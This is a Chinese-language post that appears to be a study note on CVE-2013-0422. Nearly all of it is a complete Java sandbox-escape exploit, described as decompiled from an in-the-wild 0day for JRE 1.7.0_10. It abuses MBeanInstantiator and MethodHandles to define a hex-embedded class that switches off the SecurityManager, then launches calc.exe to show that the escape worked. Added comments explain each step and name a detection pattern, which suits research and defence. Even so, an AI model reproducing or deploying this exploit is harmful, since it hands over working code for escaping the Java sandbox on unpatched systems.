`

CVE-2013-0422 学习


 0x01 这个是这两天爆出来的漏洞，我构建了一个本地测试代码，主要用来研究。测试方法：直接运行，看输出就可以看懂了；具体分析见后文的代码。

 

 0x02

package test;

/*
Java 0day 1.7.0_10 decrypted source
Originally placed on https://damagelab.org/index.php?showtopic=23719&st=0
From Russia with love.
 */

import java.io.IOException;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.security.Permission;
import java.security.PermissionCollection;
import java.security.Policy;
import java.security.ProtectionDomain;
import java.util.Enumeration;

import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;

/**
 * Local reproduction harness for CVE-2013-0422 (the header comment says the
 * source was decompiled from a sample targeting 1.7.0_10).
 *
 * <p>{@link #main} calls {@link #alert()} three times: before a
 * {@link SecurityManager} is installed (steps 1-2), after it is installed
 * (steps 4-5), and after the embedded class in {@link #ByteArrayWithSecOff}
 * has been loaded and instantiated (steps 6-7). Comparing the three printed
 * results shows whether the sandbox restriction on {@code Runtime.exec}
 * survives step 6.
 *
 * <p>Defensive note: every step between 5 and 6 goes through JDK-internal
 * APIs ({@code com.sun.jmx.mbeanserver.*}, {@code sun.org.mozilla.javascript.internal.*})
 * and {@code MethodHandles}. On a runtime where those paths are patched, one
 * of the reflective calls is presumably expected to throw (confirm against the
 * vendor advisory); the {@code Throwable} catch at the end of {@code main}
 * then just prints the stack trace.
 */
public class Test {
	/**
	 * Prints every permission the current {@link Policy} grants to this
	 * class's {@link ProtectionDomain}, one per line, followed by the count.
	 * Not called from {@link #main} (the call is commented out there); useful
	 * for checking what the sandbox actually grants before/after step 6.
	 */
	void checkPermission() {
		ProtectionDomain domain = this.getClass().getProtectionDomain();
		PermissionCollection pcoll = Policy.getPolicy().getPermissions(domain);
		// Raw Enumeration: PermissionCollection.elements() is a pre-generics API.
		Enumeration e = pcoll.elements();
		int i = 0;
		for (; e.hasMoreElements();) {
			Permission p = (Permission) e.nextElement();
			System.out.println(i + ": " + p);
			i++;
		}
		System.out.println("the num:" + i);
	}

	/**
	 * The "privileged action" probe: runs {@code calc.exe} via
	 * {@link Runtime#exec(String)}.
	 *
	 * <p>Only {@link IOException} is caught here (printed and rethrown). A
	 * {@link SecurityException} raised by an installed {@link SecurityManager}
	 * is unchecked and propagates to the caller; {@link #main} relies on that
	 * to tell "exec allowed" from "exec denied".
	 *
	 * @throws IOException if the process cannot be started
	 */
	void alert() throws IOException {
		try {
			Runtime.getRuntime().exec("calc.exe");
		} catch (IOException e) {
			// Surface the failure on stderr, then let the caller see it too.
			e.printStackTrace();
			throw e;
		}
	}

	/**
	 * Drives the three-phase test described on the class. Every failure in
	 * the reflective chain lands in the {@code Throwable} catch at the bottom,
	 * so a patched runtime shows up as a printed stack trace rather than as
	 * a "7." line.
	 *
	 * @param args ignored
	 */
	public static void main(String args[]) {
		try {
			System.out.println("1.SecurityManager 开启前测试");
			Test test = new Test();
			// test.checkPermission();
			// Step 2: no SecurityManager yet, so exec is expected to succeed.
			try {
				test.alert();
				System.out.println("2.成功执行 exec");
			} catch (SecurityException e) {
				System.out.println("2.you have no permission to exec");
			}

			System.out.println("3.开启SecurityManager");
			System.setSecurityManager(new SecurityManager());
			System.out.println("4.SecurityManager 开启后测试");
			// Step 5: with the default SecurityManager installed, exec should be denied.
			try {
				test.alert();
				System.out.println("5.成功执行 exec");
			} catch (SecurityException e) {
				System.out.println("5.you have no permission to exec");
			}

			// Decode the embedded class file (see ByteArrayWithSecOff) into raw bytes.
			byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);

			// Obtain an MBeanInstantiator through the JMX server builder
			// (com.sun.jmx internal API, not part of the public JDK surface).
			JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();

			JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer) localJmxMBeanServerBuilder
					.newMBeanServer("", null, null);

			MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer
					.getMBeanInstantiator();

			// A null loader is passed on purpose; findClass is asked to resolve
			// two sun.org.mozilla.javascript.internal classes on the caller's
			// behalf. Presumably this is the package-access bypass the CVE is
			// about — confirm against the advisory.
			ClassLoader a = null;

			Class localClass1 = localMBeanInstantiator.findClass(
					"sun.org.mozilla.javascript.internal.Context", a);

			Class localClass2 = localMBeanInstantiator.findClass(
					"sun.org.mozilla.javascript.internal.GeneratedClassLoader",
					a);

			// From here on every call goes through MethodHandles: first a handle
			// to Lookup.findConstructor, then a handle to Lookup.findVirtual,
			// and those two handles are used to reach the internal classes.
			MethodHandles.Lookup localLookup = MethodHandles.publicLookup();

			MethodType localMethodType1 = MethodType.methodType(
					MethodHandle.class, Class.class,
					new Class[] { MethodType.class });

			MethodHandle localMethodHandle1 = localLookup.findVirtual(
					MethodHandles.Lookup.class, "findConstructor",
					localMethodType1);

			MethodType localMethodType2 = MethodType.methodType(Void.TYPE);

			// Handle to the no-arg constructor of Context (localClass1) ...
			MethodHandle localMethodHandle2 = (MethodHandle) localMethodHandle1
					.invokeWithArguments(new Object[] { localLookup,
							localClass1, localMethodType2 });

			// ... invoked to get a Context instance.
			Object localObject1 = localMethodHandle2
					.invokeWithArguments(new Object[0]);

			MethodType localMethodType3 = MethodType.methodType(
					MethodHandle.class, Class.class, new Class[] {
							String.class, MethodType.class });

			MethodHandle localMethodHandle3 = localLookup
					.findVirtual(MethodHandles.Lookup.class, "findVirtual",
							localMethodType3);

			// Context.createClassLoader(ClassLoader) returning localClass2
			// (GeneratedClassLoader), called with a null parent loader.
			MethodType localMethodType4 = MethodType.methodType(localClass2,
					ClassLoader.class);

			MethodHandle localMethodHandle4;

			localMethodHandle4 = (MethodHandle) localMethodHandle3
					.invokeWithArguments(new Object[] { localLookup,
							localClass1, "createClassLoader", localMethodType4 });

			Object localObject2 = localMethodHandle4
					.invokeWithArguments(new Object[] { localObject1, null });

			// GeneratedClassLoader.defineClass(String, byte[]) on that loader,
			// with a null name and the decoded bytes.
			MethodType localMethodType5 = MethodType.methodType(Class.class,
					String.class, new Class[] { byte[].class });

			MethodHandle localMethodHandle5 = (MethodHandle) localMethodHandle3
					.invokeWithArguments(new Object[] { localLookup,
							localClass2, "defineClass", localMethodType5 });

			Class localClass3 = (Class) localMethodHandle5
					.invokeWithArguments(new Object[] { localObject2, null,
							arrayOfByte });

			// Instantiating the defined class is what runs its constructor;
			// whatever that constructor does (see ByteArrayWithSecOff) is the
			// payload of step 6.
			localClass3.newInstance();

			System.out.println("6.CVE-2013-0422执行后");
			// Step 7: if the SecurityManager is gone, exec succeeds again.
			try {
				test.alert();
				System.out.println("7.成功执行 exec");
			} catch (SecurityException e) {
				System.out.println("7.you have no permission to exec");
			}

		} catch (Throwable e1) {
			// Catch-all for the whole chain, including any SecurityException
			// thrown by the reflective steps on a patched runtime. Deliberately
			// broad for a test harness; it would hide failures in real code.
			e1.printStackTrace();
		}

	}

	/**
	 * Decodes a hex string (two characters per byte, upper or lower case)
	 * into a byte array.
	 *
	 * <p>No validation: an odd-length input silently drops its last
	 * character (length / 2 is floored), and any non-hex pair makes
	 * {@link Integer#parseInt(String, int)} throw
	 * {@link NumberFormatException}.
	 *
	 * @param paramString hex digits, two per byte
	 * @return the decoded bytes, {@code paramString.length() / 2} long
	 */
	public static byte[] hex2Byte(String paramString)

	{

		byte[] arrayOfByte = new byte[paramString.length() / 2];

		for (int i = 0; i < arrayOfByte.length; i++)

		{

			// Cast truncates the 0..255 parse result to a signed byte.
			arrayOfByte[i] = (byte) Integer.parseInt(
					paramString.substring(2 * i, 2 * i + 2), 16);

		}

		return arrayOfByte;

	}

	// Hex-encoded Java class file (note the CAFEBABE magic). Decoding the
	// constant-pool strings in the hex shows the source name B.java, the
	// class name B, java/security/PrivilegedExceptionAction,
	// java/security/AccessController.doPrivileged, java/lang/System and
	// setSecurityManager with descriptor (Ljava/lang/SecurityManager;)V —
	// i.e. the class whose instantiation in step 6 is meant to clear the
	// SecurityManager, which is what the "SecOff" in the name refers to.
	// For detection purposes this is the pattern to look for in similar
	// samples: a defineClass'ed class that calls setSecurityManager from
	// inside doPrivileged.
	public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001"
			+ "00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501"
			+ "00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578"
			+ "63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F"
			+ "07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263"
			+ "6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F"
			+ "457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142"
			+ "0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469"
			+ "6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F"
			+ "50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445"
			+ "7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176"
			+ "612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A"
			+ "6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000"
			+ "020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100"
			+ "040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600"
			+ "02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107"
			+ "0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000"
			+ "02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600"
			+ "0000020017";

}